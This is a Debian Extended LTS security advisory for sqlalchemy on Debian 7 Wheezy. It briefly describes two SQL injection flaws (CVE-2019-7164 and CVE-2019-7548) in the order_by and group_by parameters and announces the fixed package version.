| Package | sqlalchemy |
|---|---|
| Version | 0.7.8-1+deb7u1 |
| Related CVEs | CVE-2019-7164 CVE-2019-7548 |
Two vulnerabilities were discovered in SQLALchemy, a Python SQL Toolkit and Object Relational Mapper.
CVE-2019-7164
SQLAlchemy allows SQL Injection via the order_by parameter.
CVE-2019-7548
SQLAlchemy allows SQL Injection when the group_by parameter can be controlled.
The SQLAlchemy project warns that these security fixes break the seldom-used text coercion feature.
For Debian 7 Wheezy, these problems have been fixed in version 0.7.8-1+deb7u1.
We recommend that you upgrade your sqlalchemy packages.
Further information about Extended LTS security advisories can be found in the dedicated section of our website.